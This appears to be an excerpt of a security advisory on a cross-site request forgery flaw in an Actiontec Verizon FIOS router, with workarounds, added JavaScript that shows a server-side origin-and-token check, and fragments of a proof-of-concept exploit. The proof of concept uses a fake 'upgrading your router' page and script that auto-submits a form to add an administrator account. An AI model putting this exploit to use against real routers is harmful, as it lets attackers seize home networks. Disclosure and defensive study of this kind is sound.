ISE SOHO Vulnerability Catalog Published - Independent Security ...
Solution
♦ There currently is not a solution to this problem.
♦ DO NOT STAY LOGGED INTO THE ROUTER'S MANAGEMENT INTERFACE.
♦ Restrict access to WAN services such as remote management to prevent an attacker from gaining access if an attack is successful.
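
The items above are user-side workarounds. As an added example (not code from the ISE catalog or from the router's firmware), the following shows a server-side check that a management interface could apply so that a form auto-submitted from another site is rejected even while the administrator is logged in. The function names, the `csrf_token` and `username` fields, and the `192.168.1.1` management address are assumptions; the sample requests are constructed.

```javascript
// Added example: CSRF check for a router-style management interface.
// Field and function names are hypothetical and the sample requests are
// constructed; this is not the device's firmware code.

// Compare two strings without stopping at the first mismatch.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string") return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) {
    diff |= a.charCodeAt(i) ^ b.charCodeAt(i % (b.length || 1));
  }
  return diff === 0;
}

// Origin ("scheme://host[:port]") of a header value, or null if unparsable.
function originOf(value) {
  try { return new URL(value).origin; } catch (e) { return null; }
}

// Decide whether a request may change configuration (for example, add a user).
// req: { method, headers (lower-cased names), body }; session: { csrfToken }
function checkStateChange(req, session, allowedOrigins) {
  if (req.method !== "POST") {
    return { ok: false, reason: "state change requires POST" };
  }
  // Browsers send Origin on cross-site form POSTs; fall back to Referer.
  const source = originOf(req.headers["origin"] || req.headers["referer"] || "");
  if (source === null || !allowedOrigins.includes(source)) {
    return { ok: false, reason: "cross-origin or missing Origin/Referer" };
  }
  // Per-session secret that a page served from another origin cannot read.
  const token = (req.body && req.body.csrf_token) || "";
  if (!session || !session.csrfToken || !constantTimeEqual(token, session.csrfToken)) {
    return { ok: false, reason: "missing or wrong CSRF token" };
  }
  return { ok: true, reason: "same-origin with valid token" };
}

// Constructed sample data: management UI origin and a logged-in session.
const ALLOWED = ["http://192.168.1.1"];
const SESSION = { csrfToken: "constructed-token-5f2c9a" };
// Forged: auto-submitted from a page on another origin, no token available.
const forged = { method: "POST", headers: { origin: "http://10.0.1.101" },
                 body: { username: "newadmin" } };
// Legitimate: submitted from the router's own page, token included.
const legit = { method: "POST", headers: { origin: "http://192.168.1.1" },
                body: { username: "newadmin", csrf_token: SESSION.csrfToken } };
console.log(checkStateChange(forged, SESSION, ALLOWED));
console.log(checkStateChange(legit, SESSION, ALLOWED));
```

The origin check alone stops the forged request; the token check covers clients or proxies that strip `Origin` and `Referer`.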
Proof of Concept Exploit
HTML FILE #1

Actiontec Verizon FIOS CSRF - Adding Administrator User

Please sit tight while we upgrade your router

function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonActiontec.submit();};window.setTimeout(CSRF2,1000)

HTML FILE #2

Actiontec Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation